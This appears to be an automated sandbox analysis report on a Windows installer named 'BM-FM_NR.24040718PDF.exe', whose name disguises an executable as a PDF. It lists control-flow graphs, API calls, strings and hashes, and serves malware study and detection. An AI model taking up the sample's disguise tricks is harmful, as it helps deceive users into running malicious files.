                                                                      control_flow_graph 128 405086-4050a2 129 405231-405237 128->129 130 4050a8-40516f GetDlgItem * 3 call 403f49 call 4047e6 GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405261-40526d 129->132 133 405239-40525b GetDlgItem CreateThread CloseHandle 129->133 150 405171-40518b SendMessageA * 2 130->150 151 40518d-405190 130->151 135 40528f-405295 132->135 136 40526f-405275 132->136 133->132 140 405297-40529d 135->140 141 4052ea-4052ed 135->141 138 4052b0-4052b7 call 403f7b 136->138 139 405277-40528a ShowWindow * 2 call 403f49 136->139 154 4052bc-4052c0 138->154 139->135 145 4052c3-4052d3 ShowWindow 140->145 146 40529f-4052ab call 403eed 140->146 141->138 143 4052ef-4052f5 141->143 143->138 152 4052f7-40530a SendMessageA 143->152 148 4052e3-4052e5 call 403eed 145->148 149 4052d5-4052de call 404f48 145->149 146->138 148->141 149->148 150->151 157 4051a0-4051b7 call 403f14 151->157 158 405192-40519e SendMessageA 151->158 159 405310-40533c CreatePopupMenu call 405d51 AppendMenuA 152->159 160 405407-405409 152->160 167 4051b9-4051cd ShowWindow 157->167 168 4051ed-40520e GetDlgItem SendMessageA 157->168 158->157 165 405351-405367 TrackPopupMenu 159->165 166 40533e-40534e GetWindowRect 159->166 160->154 165->160 170 40536d-405387 165->170 166->165 171 4051dc 167->171 172 4051cf-4051da ShowWindow 167->172 168->160 169 405214-40522c SendMessageA * 2 168->169 169->160 173 40538c-4053a7 SendMessageA 170->173 174 4051e2-4051e8 call 403f49 171->174 172->174 173->173 176 4053a9-4053c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->176 174->168 177 4053cb-4053eb SendMessageA 176->177 177->177 178 4053ed-405401 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                      • GetClientRect.USER32(?,?), ref: 00405131
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                      • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                        • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                      • ShowWindow.USER32(00000000), ref: 0040527E
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                      • ShowWindow.USER32(00000008), ref: 004052CB
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                      • CreatePopupMenu.USER32 ref: 00405310
                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                      • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                      • EmptyClipboard.USER32 ref: 004053B0
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                      • CloseClipboard.USER32 ref: 00405401
                                                                      Strings
                                                                      • Dominique Setup: Installing, xrefs: 00405376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: Dominique Setup: Installing
                                                                      • API String ID: 590372296-2270509071
                                                                      • Opcode ID: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                                      • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                      • Opcode Fuzzy Hash: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                                      • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 423 405d51-405d5c 424 405d5e-405d6d 423->424 425 405d6f-405d84 423->425 424->425 426 405f77-405f7b 425->426 427 405d8a-405d95 425->427 428 405f81-405f8b 426->428 429 405da7-405db1 426->429 427->426 430 405d9b-405da2 427->430 431 405f96-405f97 428->431 432 405f8d-405f91 call 405d2f 428->432 429->428 433 405db7-405dbe 429->433 430->426 432->431 435 405dc4-405df9 433->435 436 405f6a 433->436 437 405f14-405f17 435->437 438 405dff-405e0a GetVersion 435->438 439 405f74-405f76 436->439 440 405f6c-405f72 436->440 443 405f47-405f4a 437->443 444 405f19-405f1c 437->444 441 405e24 438->441 442 405e0c-405e10 438->442 439->426 440->426 448 405e2b-405e32 441->448 442->441 445 405e12-405e16 442->445 449 405f58-405f68 lstrlenA 443->449 450 405f4c-405f53 call 405d51 443->450 446 405f2c-405f38 call 405d2f 444->446 447 405f1e-405f2a call 405c8d 444->447 445->441 451 405e18-405e1c 445->451 461 405f3d-405f43 446->461 447->461 453 405e34-405e36 448->453 454 405e37-405e39 448->454 449->426 450->449 451->441 457 405e1e-405e22 451->457 453->454 459 405e72-405e75 454->459 460 405e3b-405e5e call 405c16 454->460 457->448 464 405e85-405e88 459->464 465 405e77-405e83 GetSystemDirectoryA 459->465 472 405e64-405e6d call 405d51 460->472 473 405efb-405eff 460->473 461->449 463 405f45 461->463 470 405f0c-405f12 call 405f9a 463->470 467 405ef2-405ef4 464->467 468 405e8a-405e98 GetWindowsDirectoryA 464->468 466 405ef6-405ef9 465->466 466->470 466->473 467->466 471 405e9a-405ea4 467->471 468->467 470->449 476 405ea6-405ea9 471->476 477 405ebe-405ed4 SHGetSpecialFolderLocation 471->477 472->466 473->470 479 405f01-405f07 lstrcatA 473->479 476->477 480 405eab-405eb2 476->480 481 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 477->481 482 405eef 477->482 479->470 484 405eba-405ebc 480->484 481->466 481->482 482->467 484->466 484->477
                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000), ref: 00405E02
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7D
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E90
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,0041B020), ref: 00405ECC
                                                                      • SHGetPathFromIDListA.SHELL32(0041B020,Call), ref: 00405EDA
                                                                      • CoTaskMemFree.OLE32(0041B020), ref: 00405EE5
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000), ref: 00405F59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-1078146441
                                                                      • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                      • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                      • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                      • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                      • String ID:
                                                                      • API String ID: 4227406936-0
                                                                      • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                      • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 685 4055d1-4055f7 call 40588f 688 405610-405617 685->688 689 4055f9-40560b DeleteFileA 685->689 691 405619-40561b 688->691 692 40562a-40563a call 405d2f 688->692 690 40579a-40579e 689->690 693 405621-405624 691->693 694 405748-40574d 691->694 698 405649-40564a call 4057e8 692->698 699 40563c-405647 lstrcatA 692->699 693->692 693->694 694->690 697 40574f-405752 694->697 700 405754-40575a 697->700 701 40575c-405764 call 406033 697->701 703 40564f-405652 698->703 699->703 700->690 701->690 708 405766-40577a call 4057a1 call 405589 701->708 706 405654-40565b 703->706 707 40565d-405663 lstrcatA 703->707 706->707 709 405668-405686 lstrlenA FindFirstFileA 706->709 707->709 724 405792-405795 call 404f48 708->724 725 40577c-40577f 708->725 711 40568c-4056a3 call 4057cc 709->711 712 40573e-405742 709->712 718 4056a5-4056a9 711->718 719 4056ae-4056b1 711->719 712->694 714 405744 712->714 714->694 718->719 721 4056ab 718->721 722 4056b3-4056b8 719->722 723 4056c4-4056d2 call 405d2f 719->723 721->719 726 4056ba-4056bc 722->726 727 40571d-40572f FindNextFileA 722->727 735 4056d4-4056dc 723->735 736 4056e9-4056f4 call 405589 723->736 724->690 725->700 729 405781-405790 call 404f48 call 405bea 725->729 726->723 731 4056be-4056c2 726->731 727->711 733 405735-405738 FindClose 727->733 729->690 731->723 731->727 733->712 735->727 738 4056de-4056e7 call 4055d1 735->738 744 405715-405718 call 404f48 736->744 745 4056f6-4056f9 736->745 738->727 744->727 747 4056fb-40570b call 404f48 call 405bea 745->747 748 40570d-405713 745->748 747->727 748->727
                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                      • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                      • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                      • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                      • FindClose.KERNEL32(00000000), ref: 00405738
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 004055D1
                                                                      • \*.*, xrefs: 0040563C
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-2943497578
                                                                      • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                      • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                      • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                      • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(76293410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                      • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                      • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                      • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                      • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 197 403c51-403c6c 188->197 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 198 403ac2-403ac5 191->198 199 403aa8-403abd DestroyWindow 191->199 192->191 194->195 210 403c1b-403c3a SendMessageA 194->210 195->188 196 403ee1 195->196 204 403ee3-403eea 196->204 202 403c75-403c7b 197->202 203 403c6e-403c70 call 40140b 197->203 207 403ac7-403ad3 SetWindowLongA 198->207 208 403ad8-403ade 198->208 205 403ebe-403ec4 199->205 213 403c81-403c8c 202->213 214 403e9f-403eb8 DestroyWindow EndDialog 202->214 203->202 205->196 211 403ec6-403ecc 205->211 207->204 215 403b81-403b8f call 403f7b 208->215 216 403ae4-403af5 GetDlgItem 208->216 210->204 211->196 218 403ece-403ed7 ShowWindow 211->218 213->214 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 213->219 214->205 215->204 220 403b14-403b17 216->220 221 403af7-403b0e SendMessageA IsWindowEnabled 216->221 218->196 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 222 403b19-403b1a 220->222 223 403b1c-403b1f 220->223 221->196 221->220 226 403b4a-403b4f call 403eed 222->226 227 403b21-403b27 223->227 228 403b2d-403b32 223->228 226->215 230 403b68-403b7b SendMessageA 227->230 231 403b29-403b2b 227->231 228->230 232 403b34-403b3a 228->232 230->215 231->226 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->215 245 403b5c-403b66 235->245 247 403b48 236->247 245->247 247->226 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->197 267 403db4-403db6 258->267 267->197 268 403dbc-403dc0 267->268 269 403dc2-403dc8 268->269 270 403ddf-403df3 DestroyWindow 268->270 269->196 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->197 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->196 274->196 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                      • ShowWindow.USER32(?), ref: 00403A9A
                                                                      • DestroyWindow.USER32 ref: 00403AAE
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                      • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                      • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                      • lstrlenA.KERNEL32(Dominique Setup: Installing,?,Dominique Setup: Installing,Dominique Setup), ref: 00403D8E
                                                                      • SetWindowTextA.USER32(?,Dominique Setup: Installing), ref: 00403D9D
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: Dominique Setup$Dominique Setup: Installing
                                                                      • API String ID: 3282139019-196108764
                                                                      • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                      • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                      • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                      • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 282 4036af-4036c7 call 4060c8 285 4036c9-4036d9 call 405c8d 282->285 286 4036db-40370c call 405c16 282->286 294 40372f-403758 call 403974 call 40588f 285->294 290 403724-40372a lstrcatA 286->290 291 40370e-40371f call 405c16 286->291 290->294 291->290 300 40375e-403763 294->300 301 4037df-4037e7 call 40588f 294->301 300->301 302 403765-403789 call 405c16 300->302 307 4037f5-40381a LoadImageA 301->307 308 4037e9-4037f0 call 405d51 301->308 302->301 311 40378b-40378d 302->311 309 40389b-4038a3 call 40140b 307->309 310 40381c-40384c RegisterClassA 307->310 308->307 324 4038a5-4038a8 309->324 325 4038ad-4038b8 call 403974 309->325 313 403852-403896 SystemParametersInfoA CreateWindowExA 310->313 314 40396a 310->314 316 40379e-4037aa lstrlenA 311->316 317 40378f-40379c call 4057cc 311->317 313->309 322 40396c-403973 314->322 318 4037d2-4037da call 4057a1 call 405d2f 316->318 319 4037ac-4037ba lstrcmpiA 316->319 317->316 318->301 319->318 323 4037bc-4037c6 GetFileAttributesA 319->323 328 4037c8-4037ca 323->328 329 4037cc-4037cd call 4057e8 323->329 324->322 335 403941-403942 call 40501a 325->335 336 4038be-4038d8 ShowWindow call 40605a 325->336 328->318 328->329 329->318 339 403947-403949 335->339 343 4038e4-4038f6 GetClassInfoA 336->343 344 4038da-4038df call 40605a 336->344 341 403963-403965 call 40140b 339->341 342 40394b-403951 339->342 341->314 342->324 345 403957-40395e call 40140b 342->345 348 4038f8-403908 GetClassInfoA RegisterClassA 343->348 349 40390e-403931 DialogBoxParamA call 40140b 343->349 344->343 345->324 348->349 352 403936-40393f call 4035ff 349->352 352->322
                                                                      APIs
